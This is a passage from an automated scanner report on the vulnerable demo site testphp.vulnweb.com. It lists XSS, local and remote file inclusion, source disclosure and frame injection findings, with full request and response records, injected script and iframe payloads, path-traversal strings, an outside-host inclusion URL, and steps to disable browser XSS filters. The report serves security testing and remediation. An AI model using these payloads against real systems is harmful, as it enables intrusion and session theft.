</div>
<div id="content">
	<p>You have been introduced to our database with the above informations:</p><ul><li>Username: <scRipt>netsparker(0x006DB5)</scRipt></li><li>Password: </li><li>Name: </li><li>Address: </li><li>E-Mail: </li><li>Phone number: </li><li>Credit card: </li></ul><p>Now you can login from <a href='http://testphp.vulnweb.com/login.php'>here.</p></div>
</body>
</html>

5.14. http://testphp.vulnweb.com/secured/newuser.php

CONFIRMED

Method	Parameter	Value
POST	uemail	invicti@example.com
POST	uaddress	3
POST	ucc	4916613944329494
POST	upass2	Inv1@cti
POST	uuname	Smith
POST	upass	Inv1@cti
POST	uphone	'"--></style></scRipt><scRipt>netsparker(0x006E25)</scRipt>
POST	urname	Smith
POST	signup	signup

Request Response Go to the highlighted output

Request

POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 202
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

uemail=invicti%40example.com&uaddress=3&ucc=4916613944329494&upass2=Inv1%40cti&uuname=Smith&upass=Inv1%40cti&uphone='"--></style></scRipt><scRipt>netsparker(0x006E25)</scRipt>&urname=Smith&signup=signup

Response

Response Time (ms) : 754.9285

Total Bytes Received : 216

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Encoding: 
Content-Type: text/html
Transfer-Encoding: chunked
Date: Sun, 29 Mar 1970 16:33:24 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>add new user</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<div id="masthead"> 
  <h1 id="siteName">ACUNETIX ART</h1> 
</div>
<div id="content">
	<p>You have been introduced to our database with the above informations:</p><ul><li>Username: Smith</li><li>Password: Inv1@cti</li><li>Name: Smith</li><li>Address: 3</li><li>E-Mail: invicti@example.com</li><li>Phone number: '"--></style></scRipt><scRipt>netsparker(0x006E25)</scRipt></li><li>Credit card: 4916613944329494</li></ul><p>Now you can login from <a href='http://testphp.vulnweb.com/login.php'>here.</p></div>
</body>
</html>

5.15. http://testphp.vulnweb.com/secured/newuser.php

CONFIRMED

Method	Parameter	Value
POST	uemail	invicti@example.com
POST	uaddress	3
POST	ucc	4916613944329494
POST	upass2	Inv1@cti
POST	uuname	Smith
POST	upass	Inv1@cti
POST	uphone	3
POST	urname	'"--></style></scRipt><scRipt>netsparker(0x006E2A)</scRipt>
POST	signup	signup

Request Response Go to the highlighted output

Request

POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 198
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

uemail=invicti%40example.com&uaddress=3&ucc=4916613944329494&upass2=Inv1%40cti&uuname=Smith&upass=Inv1%40cti&uphone=3&urname='"--></style></scRipt><scRipt>netsparker(0x006E2A)</scRipt>&signup=signup

Response

Response Time (ms) : 255.6564

Total Bytes Received : 216

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Encoding: 
Content-Type: text/html
Transfer-Encoding: chunked
Date: Sun, 29 Mar 1970 16:33:32 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>add new user</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<div id="masthead"> 
  <h1 id="siteName">ACUNETIX ART</h1> 
</div>
<div id="content">
	<p>You have been introduced to our database with the above informations:</p><ul><li>Username: Smith</li><li>Password: Inv1@cti</li><li>Name: '"--></style></scRipt><scRipt>netsparker(0x006E2A)</scRipt></li><li>Address: 3</li><li>E-Mail: invicti@example.com</li><li>Phone number: 3</li><li>Credit card: 4916613944329494</li></ul><p>Now you can login from <a href='http://testphp.vulnweb.com/login.php'>here.</p></div>
</body>
</html>

Show Remediation Hide Remediation

Remedy

The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, output should be encoded according to the output location and context. For example, if the output goes in to a JavaScript block within the HTML document, then output needs to be encoded accordingly. Encoding can get very complex, therefore it's strongly recommended to use an encoding library such as OWASP ESAPI and Microsoft Anti-cross-site scripting.

Additionally, you should implement a strong Content Security Policy (CSP) as a defense-in-depth measure if an XSS vulnerability is mistakenly introduced. Due to the complexity of XSS-Prevention and the lack of secure standard behavior in programming languages and frameworks, XSS vulnerabilities are still common in web applications.

CSP will act as a safeguard that can prevent an attacker from successfully exploiting Cross-site Scripting vulnerabilities in your website and is advised in any kind of application. Please make sure to scan your application again with Content Security Policy checks enabled after implementing CSP, in order to avoid common mistakes that can impact the effectiveness of your policy. There are a few pitfalls that can render your CSP policy useless and we highly recommend reading the resources linked in the reference section before you start to implement one.

External References

Remedy References

Proof of Concept Notes

Generated XSS exploit might not work due to browser XSS filtering. Please follow the guidelines below in order to disable XSS filtering for different browsers. Also note that;

XSS filtering is a feature that's enabled by default in some of the modern browsers. It should only be disabled temporarily to test exploits and should be reverted back if the browser is actively used other than testing purposes.
Even though browsers have certain checks to prevent Cross-site scripting attacks in practice there are a variety of ways to bypass this mechanism therefore a web application should not rely on this kind of client-side browser checks.

Chrome

Open command prompt.
Go to folder where chrome.exe is located.
Run the command chrome.exe --args --disable-xss-auditor

Internet Explorer

Click Tools->Internet Options and then navigate to the Security Tab.
Click Custom level and scroll towards the bottom where you will find that Enable XSS filter is currently Enabled.
Set it to disabled. Click OK.
Click Yes to accept the warning followed by Apply.

Firefox

Go to about:config in the URL address bar.
In the search field, type urlbar.filter and find browser.urlbar.filter.javascript.
Set its value to false by double clicking the row.

Safari

To disable the XSS Auditor, open Terminal and executing the command: defaults write com.apple.Safari "com.apple.Safari.ContentPageGroupIdentifier.WebKit2XSSAuditorEnabled" -bool FALSE
Relaunch the browser and visit the PoC URL
Please don't forget to enable XSS auditor again: defaults write com.apple.Safari "com.apple.Safari.ContentPageGroupIdentifier.WebKit2XSSAuditorEnabled" -bool TRUE

CLASSIFICATION

HIPAA

CVSS 3.0 SCORE
Base	7.4 (High)
Temporal	7.4 (High)
Environmental	7.4 (High)

CVSS Vector String
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

CVSS 3.1 SCORE
Base	7.4 (High)
Temporal	7.4 (High)
Environmental	7.4 (High)

CVSS Vector String
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

6. [Probable] Local File Inclusion

HIGH

Acunetix 360 identified a probable Local File Inclusion vulnerability, which occurs when a file from the target system is injected into the attacked server page.

Even though Acunetix 360 believes there is a high possibility of a local file inclusion in here, it could not confirm it. There can be numerous reasons for Acunetix 360 being unable to confirm it. We strongly recommend you investigate the issue manually to ensure it is a local file inclusion and needs to be addressed. You can also consider sending us the details of this issue so we can address it the next time and give you more precise results.

Impact

Impact can differ based on the exploitation and the read permission of the web server user. Depending on these factors, an attacker might carry out one or more of the following attacks:

Gather usernames via /etc/passwd file
Harvest useful information from the log files, such as /apache/logs/error.log or /apache/logs/access.log
Remotely execute commands via combining this vulnerability with some of other attack vectors, such as file upload vulnerability or log injection

Vulnerabilities

6.1. http://testphp.vulnweb.com/showimage.php?file=%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc%2fversion&size=160

Method	Parameter	Value
GET	file	/../../../../../../../../../../proc/version
GET	size	160

Certainty

Request Response Go to the highlighted output

Request

GET /showimage.php?file=%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc%2fversion&size=160 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/search.php?test=query
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 1875.8149

Total Bytes Received : 197

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: image/jpeg
Transfer-Encoding: chunked
Date: Sun, 29 Mar 1970 16:22:11 GMT

Linux version 2.6.32-46-server (buildd@lamiak) (gcc version 4.4.3 (Ubuntu 4.4.3-4ubuntu5.1) ) #108-Ubuntu SMP Thu Apr 11 16:11:15 UTC 2013

Show Remediation Hide Remediation

Remedy

If possible, do not permit file paths to be appended directly. Make them hard-coded or selectable from a limited hard-coded path list via an index variable.
If you definitely need dynamic path concatenation, ensure you only accept required characters such as "a-Z0-9" and do not allow ".." or "/" or "%00" (null byte) or any other similar unexpected characters.
It's important to limit the API to allow inclusion only from a directory and directories below it. This ensures that any potential attack cannot perform a directory traversal attack.

External References

Local File Inclusion Vulnerability

CLASSIFICATION

HIPAA

CVSS 3.0 SCORE
Base	8.6 (High)
Temporal	8.6 (High)
Environmental	8.6 (High)

CVSS Vector String
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

CVSS 3.1 SCORE
Base	8.6 (High)
Temporal	8.6 (High)
Environmental	8.6 (High)

CVSS Vector String
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

7. Local File Inclusion

HIGH

CONFIRMED

Acunetix 360 identified a Local File Inclusion vulnerability, which occurs when a file from the target system is injected into the attacked server page.

Acunetix 360 confirmed this issue by reading some files from the target web server.

Impact

The impact can vary, based on the exploitation and the read permission of the web server user. Depending on these factors, an attacker might carry out one or more of the following attacks:

Gather usernames via an "/etc/passwd" file
Harvest useful information from the log files, such as "/apache/logs/error.log" or "/apache/logs/access.log"
Remotely execute commands by combining this vulnerability with some other attack vectors, such as file upload vulnerability or log injection

Vulnerabilities

7.1. http://testphp.vulnweb.com/showimage.php?file=data%3a%3bbase64%2cTlM3NzU0NTYxNDQ2NTc1&size=160

CONFIRMED

Method	Parameter	Value
GET	file	data:;base64,TlM3NzU0NTYxNDQ2NTc1
GET	size	160

Request Response Go to the highlighted output

Request

GET /showimage.php?file=data%3a%3bbase64%2cTlM3NzU0NTYxNDQ2NTc1&size=160 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/search.php?test=query
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 97.1065

Total Bytes Received : 197

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: image/jpeg
Transfer-Encoding: chunked
Date: Sun, 29 Mar 1970 16:22:45 GMT

NS7754561446575

Show Remediation Hide Remediation

Remedy

If possible, do not permit appending file paths directly. Make them hard-coded or selectable from a limited hard-coded path list via an index variable.
If you definitely need dynamic path concatenation, ensure you only accept required characters such as "a-Z0-9" and do not allow ".." or "/" or "%00" (null byte) or any other similar unexpected characters.
It is important to limit the API to allow inclusion only from a directory and directories below it. This way you can ensure any potential attack cannot perform a directory traversal attack.

External References

Local File Inclusion Vulnerability

CLASSIFICATION

HIPAA

CVSS 3.0 SCORE
Base	8.6 (High)
Temporal	8.6 (High)
Environmental	8.6 (High)

CVSS Vector String
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

CVSS 3.1 SCORE
Base	8.6 (High)
Temporal	8.6 (High)
Environmental	8.6 (High)

CVSS Vector String
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

8. Cross-site Scripting via Remote File Inclusion

HIGH

Acunetix 360 detected Cross-site Scripting via Remote File Inclusion, which makes it is possible to conduct cross-site scripting attacks by including arbitrary client-side dynamic scripts (JavaScript, VBScript).

Cross-site scripting allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by the user has been interpreted as HTML/JavaScript/VBScript by the browser.

Cross-site scripting targets the users of the application instead of the server. Although this is limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of cross-site scripting, including:

Hijacking user's active session.
Changing the look of the page within the victim's browser.
Mounting a successful phishing attack.
Intercepting data and performing man-in-the-middle attacks.

Vulnerabilities

8.1. http://testphp.vulnweb.com/showimage.php?file=hTTp%3a%2f%2fr87.com%2fn&size=160

Method	Parameter	Value
GET	file	hTTp://r87.com/n
GET	size	160

Notes

Due to the Content-type header of the response, exploitation of this vulnerability might not be possible because of the browser used or because of the presence of certain web tools. We recommend that you fix this even if it is not an exploitable XSS vulnerability because it can allow an attacker to introduce other attacks to exploit it. But, these issues are not confirmed; you will need to manually confirm them yourself. In general, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with built-in mime sniffing (such as Internet Explorer).

Certainty

Request Response Go to the highlighted output

Request

GET /showimage.php?file=hTTp%3a%2f%2fr87.com%2fn&size=160 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/search.php?test=query
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 873.2319

Total Bytes Received : 197

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: image/jpeg
Transfer-Encoding: chunked
Date: Sun, 29 Mar 1970 16:21:49 GMT

<? print chr(78).chr(69).chr(84).chr(83).chr(80).chr(65).chr(82).chr(75).chr(69).chr(82).chr(95).chr(70).chr(48).chr(77).chr(49) ?>
<? print chr(45).(44353702950+(intval($_GET["nsxint"])*4567)).chr(45) ?>
<script>netsparkerRFI(0x066666)</script>

Show Remediation Hide Remediation

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically, the output location is HTML. Where the output is HTML, ensure all active content is removed prior to its presentation to the server.

Additionally, you should implement a strong Content Security Policy (CSP) as a defence-in-depth measure if an XSS vulnerability is mistakenly introduced. Due to the complexity of XSS-Prevention and the lack of secure standard behavior in programming languages and frameworks, XSS vulnerabilities are still common in web applications.

CSP will act as a safeguard that can prevent an attacker from successfully exploiting Cross Site Scripting vulnerabilities in your website and is advised in any kind of application. Please make sure to scan your application again with Content Security Policy checks enabled after implementing CSP, in order to avoid common mistakes that can impact the effectiveness of your policy. There are a few pitfalls that can render your CSP policy useless and we highly recommend reading the resources linked in the reference section before you start to implement one.

External References

Remedy References

CLASSIFICATION

HIPAA

CVSS 3.0 SCORE
Base	8.6 (High)
Temporal	8.6 (High)
Environmental	8.6 (High)

CVSS Vector String
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

CVSS 3.1 SCORE
Base	8.6 (High)
Temporal	8.6 (High)
Environmental	8.6 (High)

CVSS Vector String
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

9. [Possible] Source Code Disclosure (PHP)

MEDIUM

Acunetix 360 identified a possible source code disclosure (PHP).

An attacker can obtain server-side source code of the web application, which can contain sensitive data - such as database connection strings, usernames and passwords - along with the technical and business logic of the application.

Impact

Depending on the source code, database connection strings, username, and passwords, the internal workings and business logic of application might be revealed. With such information, an attacker can mount the following types of attacks:

Access the database or other data resources. Depending on the privileges of the account obtained from the source code, it may be possible to read, update or delete arbitrary data from the database.
Gain access to password protected administrative mechanisms such as dashboards, management consoles and admin panels, hence gaining full control of the application.
Develop further attacks by investigating the source code for input validation errors and logic vulnerabilities.

Vulnerabilities

9.1. http://testphp.vulnweb.com/showimage.php?file=hTTp%3a%2f%2fr87.com%2fn&size=160

Method	Parameter	Value
GET	file	hTTp://r87.com/n
GET	size	160

<? print chr(78).chr(69).chr(84).chr(83).chr(80).chr(65).chr(82).chr(75).chr(69).chr(82).chr(95).chr(70).chr(48).chr(77).chr(49) ?>

Certainty

Request Response Go to the highlighted output

Request

GET /showimage.php?file=hTTp%3a%2f%2fr87.com%2fn&size=160 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/search.php?test=query
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 873.2319

Total Bytes Received : 197

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: image/jpeg
Transfer-Encoding: chunked
Date: Sun, 29 Mar 1970 16:21:49 GMT

<? print chr(78).chr(69).chr(84).chr(83).chr(80).chr(65).chr(82).chr(75).chr(69).chr(82).chr(95).chr(70).chr(48).chr(77).chr(49) ?>
<? print chr(45).(44353702950+(intval($_GET["nsxint"])*4567)).chr(45) ?>
<script>netsparkerRFI(0x066666)</script>

Show Remediation Hide Remediation

Actions to Take

Confirm exactly what aspects of the source code are actually disclosed; due to the limitations of this type of vulnerability, it might not be possible to confirm this in all instances. Confirm this is not an intended functionality.
If it is a file required by the application, change its permissions to prevent public users from accessing it. If it is not, then remove it from the web server.
Ensure that the server has all the current security patches applied.
Remove all temporary and backup files from the web server.

Required Skills for Successful Exploitation

This is dependent on the information obtained from the source code. Uncovering these forms of vulnerabilities does not require high levels of skills. However, a highly skilled attacker could leverage this form of vulnerability to obtain account information from databases or administrative panels, ultimately leading to the control of the application or even the host the application resides on.

External References

Source Code Disclosure over HTTP - SecurEyes

CLASSIFICATION

HIPAA

http://testphp.vulnweb.com/showimage.php?file='%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x00503F)%3C/scRipt%3E&size=160

CVSS 3.0 SCORE
Base	5.3 (Medium)
Temporal	5.3 (Medium)
Environmental	5.3 (Medium)

CVSS Vector String
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CVSS 3.1 SCORE
Base	5.3 (Medium)
Temporal	5.3 (Medium)
Environmental	5.3 (Medium)

CVSS Vector String
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

10. [Possible] Cross-site Scripting

MEDIUM

Acunetix 360 detected Possible Cross-site Scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.

Although Acunetix 360 believes there is a cross-site scripting in here, it could not confirm it. We strongly recommend investigating the issue manually to ensure it is cross-site scripting and needs to be addressed.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Hijacking user's active session.
Changing the look of the page within the victim's browser.
Mounting a successful phishing attack.
Intercepting data and performing man-in-the-middle attacks.

Vulnerabilities

10.1. http://testphp.vulnweb.com/showimage.php?file='%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x00503F)%3C/scRipt%3E&size=160

Method	Parameter	Value
GET	file	'"--></style></scRipt><scRipt>netsparker(0x00503F)</scRipt>
GET	size	160

Notes

Due to the Content-type header of the response, exploitation of this vulnerability might not be possible because of the browser used or because of the presence of certain web tools. We recommend that you fix this even if it is not an exploitable XSS vulnerability because it can allow an attacker to introduce other attacks to exploit it. But, these issues are not confirmed; you will need to manually confirm them yourself. In general, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with built-in mime sniffing (such as Internet Explorer).

Proof URL

Certainty

Request Response Go to the highlighted output

Request

GET /showimage.php?file='%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x00503F)%3C/scRipt%3E&size=160 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/search.php?test=query
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 197.4963

Total Bytes Received : 197

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: image/jpeg
Transfer-Encoding: chunked
Date: Sun, 29 Mar 1970 16:21:38 GMT


Warning: fopen(): Unable to access '"--></style></scRipt><scRipt>netsparker(0x00503F)</scRipt> in /hj/var/www/showimage.php on line 19

Warning: fopen('"--></style></scRipt><scRipt>netsparker(0x00503F)</scRipt>): failed to open stream: No such file or directory in /hj/var/www/showimage.php on line 19

Warning: fpassthru() expects parameter 1 to be resource, boolean given in /hj/var/www/showimage.php on line 25

Show Remediation Hide Remediation

Remedy

This issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered / encoded. Output should be filtered / encoded according to the output format and location.

There are a number of pre-defined, well structured whitelist libraries available for many different environments. Good examples of these include OWASP Reform and Microsoft Anti-Cross-site Scripting libraries.

External References

Remedy References

CLASSIFICATION

HIPAA

CVSS 3.0 SCORE
Base	7.4 (High)
Temporal	7.4 (High)
Environmental	7.4 (High)

CVSS Vector String
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

CVSS 3.1 SCORE
Base	7.4 (High)
Temporal	7.4 (High)
Environmental	7.4 (High)

CVSS Vector String
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

11. Frame Injection

MEDIUM

CONFIRMED

Acunetix 360 detected Frame Injection, which occurs when a frame on a vulnerable web page displays another web page via a user-controllable input.

Impact

An attacker might use this vulnerability to redirect users to other malicious websites that are used for phishing and similar attacks. Additionally they might place a fake login form in the frame, which can be used to steal credentials from your users.

It should be noted that attackers can also abuse injected frames in order to circumvent certain client side security mechanisms. Developers might overwrite functions to make it harder for attackers to abuse a vulnerability.

If an attacker uses a javascript: URL as src attribute of an iframe, the malicious JavaScript code is executed under the origin of the vulnerable website. However, it has access to a fresh window object without any overwritten functions.

Vulnerabilities

11.1. http://testphp.vulnweb.com/comment.php

CONFIRMED

Method	Parameter	Value
POST	phpaction	echo $_POST[comment];
POST	comment
POST	Submit	Submit
POST	name	<iframe src="http://r87.com/?"></iframe>

Request Response Go to the highlighted output

Request

POST /comment.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 134
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/comment.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

phpaction=echo+%24_POST%5bcomment%5d%3b&comment=&Submit=Submit&name=%3ciframe+src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e

Response

Response Time (ms) : 1716.4804

Total Bytes Received : 216

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Encoding: 
Content-Type: text/html
Transfer-Encoding: chunked
Date: Sun, 29 Mar 1970 16:45:28 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>
<iframe src="http://r87.com/?"></iframe> commented</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
body {
	margin-left: 0px;
	margin-top: 0px;
	margin-right: 0px;
	margin-bottom: 0px;
}
-->
</style>
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<p class='story'><iframe src="http://r87.com/?"></iframe>, thank you for your comment.</p><p class='story'><i></p></i></body>
</html>

11.2. http://testphp.vulnweb.com/guestbook.php

CONFIRMED

Method	Parameter	Value
POST	submit	add message
POST	text	<iframe src="http://r87.com/?"></iframe>
POST	name	anonymous user

Request Response Go to the highlighted output

Request

POST /guestbook.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 110
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/guestbook.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

submit=add+message&text=%3ciframe+src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e&name=anonymous+user

Response

Response Time (ms) : 668.3318

Total Bytes Received : 216

Body Length : 0

Is Compressed : No


…
ground-color:#F5F5F5"><strong>anonymous user</strong></td><td align="right" style="background-color:#F5F5F5">03.29.1970, 5:20 pm</td></tr><tr><td colspan="2"><img src="/images/remark.gif">&nbsp;&nbsp;<iframe src="http://r87.com/?"></iframe></td></tr></table>	 </div>
	  <div class="story">
	  	<form action="" method="post" name="faddentry">
			<input type="hidden" name="name" value="test">
			<textarea name="text" rows="5" wrap="VIRTUAL"
…

11.3. http://testphp.vulnweb.com/guestbook.php

CONFIRMED

Method	Parameter	Value
POST	submit	add message
POST	text
POST	name	<iframe src="http://r87.com/?"></iframe>

Request Response Go to the highlighted output

Request

POST /guestbook.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 96
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/guestbook.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

submit=add+message&text=&name=%3ciframe+src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e

Response

Response Time (ms) : 3687.9606

Total Bytes Received : 216

Body Length : 0

Is Compressed : No


…
v class="story">
	<table width="100%" cellpadding="4" cellspacing="1"><tr><td colspan="2"><h2>Our guestbook</h2></td></tr><tr><td align="left" valign="middle" style="background-color:#F5F5F5"><strong><iframe src="http://r87.com/?"></iframe></strong></td><td align="right" style="background-color:#F5F5F5">03.29.1970, 5:21 pm</td></tr><tr><td colspan="2"><img src="/images/remark.gif">&nbsp;&nbsp;</td></tr></table>	 </div>
	  <div class="st
…

11.4. http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=&p=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e&pp=12

CONFIRMED

Method	Parameter	Value
GET	p	<iframe src="http://r87.com/?"></iframe>
GET	pp	12
GET	aaaa%2f

Request Response Go to the highlighted output

Request

